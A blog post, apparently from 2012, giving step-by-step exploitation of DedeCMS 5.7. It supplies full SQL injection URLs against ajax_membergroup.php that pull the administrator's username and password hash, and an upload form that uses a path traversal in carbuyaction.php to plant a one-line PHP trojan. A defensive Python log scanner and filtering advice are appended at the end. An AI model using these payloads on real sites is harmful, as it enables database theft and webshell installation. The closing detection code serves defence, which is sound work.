Dream (DedeCMS) 5.7: an injection plus an upload vulnerability
Category: Security | 2012-05-5
The member center's member-information query does not filter its input strictly, so injection parameters can be submitted in the URL;
The member center's upload action is also not filtered strictly, resulting in an upload vulnerability.
Detailed Description:
① Injection vulnerability.
Using this site, http://www.webshell.cc/, as the example:
First visit the "/data/admin/ver.txt" page to get the time of the system's last upgrade,
then access the
"/member/ajax_membergroup.php?action=post&membergroup=1"
page; as the figure shows, the vulnerability is present.
Then write the injection statement.
View Administrator Account
http://www.webshell.cc//member/ajax_membergroup.php?action=post&membergroup=@ ' '%20Union%20select%20userid %20from%20 '%23@__admin '%20where%201%20or%20id=@ '
Admin
View Administrator Password
http://www.webshell.cc//member/ajax_membergroup.php?action=post&membergroup=@ ' '%20Union%20select%20pwd% 20from%20 '%23@__admin '%20where%201%20or%20id=@
8d29b1ef9f8c5a5af429
View Administrator Password
The result is 19 characters; remove the first three and the last one to get the admin's 16-character MD5:
8d2
9b1ef9f8c5a5af42
9
Cmd5 didn't solve it, so I had to test the second method.
② Upload Vulnerability:
Just log in to the member center and then visit the page link:
"/plus/carbuyaction.php?dopost=memclickout&oid=s-p0rn8888&rs[code]=." /dialog/select_soft_post "
As shown in the figure, "/plus/carbuyaction.php" has successfully called the upload page "/dialog/select_soft_post".
So change the extension of the one-line PHP trojan to "RAR" or similar, and upload it using the submission page upload1.htm:
<form action= =.. /dialog/select_soft_post]
<[/url ">http://www.webshell.cc/plus/carbuyaction.php?dopost=memclickout &oid=s-p0rn8888&rs[code]=.. /dialog/select_soft_post "method=" POST "
enctype=" Multipart/form-data "Name=" Form1 "
File:<input name= "UploadFile" type= "file"/><br>,
newname:<input name= "newname" text "type=" value=. PHP "/>
<button class=" Button2 "type=" submit "> Submit </button><br><br>
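A defensive check for the request patterns described above, as an added example that is not part of the original post: it scans web access-log lines for reads of "/data/admin/ver.txt", a non-numeric "membergroup" value, and a "rs[code]" value containing path characters. The log lines are constructed samples; the function names and labels are hypothetical, and it is an assumption that legitimate traffic sends a numeric membergroup and a plain name in rs[code].

```python
import re
from urllib.parse import parse_qsl, unquote

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def classify(line):
    """Return a finding label for one access-log line, or None."""
    m = REQUEST.search(line)
    if not m:
        return None
    # Split by hand: urlsplit() would read a leading "//member" as a host name,
    # and the URLs in the post do start with a double slash.
    raw_path, _, query = m.group(1).partition("?")
    path = re.sub(r"/+", "/", unquote(raw_path)).lower()
    if path == "/data/admin/ver.txt":
        return "version-file-read"          # worth reviewing, not proof of attack
    # parse_qsl percent-decodes keys and values, so rs%5Bcode%5D is caught too.
    for key, value in parse_qsl(query, keep_blank_values=True):
        if path == "/member/ajax_membergroup.php" and key == "membergroup":
            if not re.fullmatch(r"[0-9]+", value):   # assumption: ids are numeric
                return "membergroup-not-numeric"
        if path == "/plus/carbuyaction.php" and key == "rs[code]":
            if ".." in value or "/" in value or "\\" in value:
                return "rs-code-path-traversal"
    return None

def scan(lines):
    """Return (line_number, label) for every flagged line."""
    return [(n, label) for n, line in enumerate(lines, 1)
            if (label := classify(line))]

# Constructed sample lines in combined log format, not from a real server.
SAMPLE_LOG = [
    '198.51.100.7 - - [05/May/2012:10:00:00 +0800] "GET /index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/May/2012:10:00:03 +0800] "GET /data/admin/ver.txt HTTP/1.1" 200 8',
    '203.0.113.9 - - [05/May/2012:10:00:05 +0800] "GET /member/ajax_membergroup.php?action=post&membergroup=1 HTTP/1.1" 200 312',
    '198.51.100.7 - - [05/May/2012:10:00:09 +0800] "GET //member/ajax_membergroup.php?action=post&membergroup=1%20union%20select%20x HTTP/1.1" 200 298',
    '198.51.100.7 - - [05/May/2012:10:01:30 +0800] "POST /plus/carbuyaction.php?dopost=memclickout&oid=s-p0rn8888&rs[code]=../dialog/select_soft_post HTTP/1.1" 200 640',
    '203.0.113.9 - - [05/May/2012:10:02:00 +0800] "GET /plus/carbuyaction.php?dopost=memclickout&oid=1&rs[code]=alipay HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, label in scan(SAMPLE_LOG):
        print(number, label)
```

The same two conditions can be enforced at the server or WAF: reject a membergroup value that is not all digits, and reject any rs[code] value that contains a dot-dot or a path separator.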
Dream 5.7 Injection plus a loophole: http://www.webshell.cc/3520.html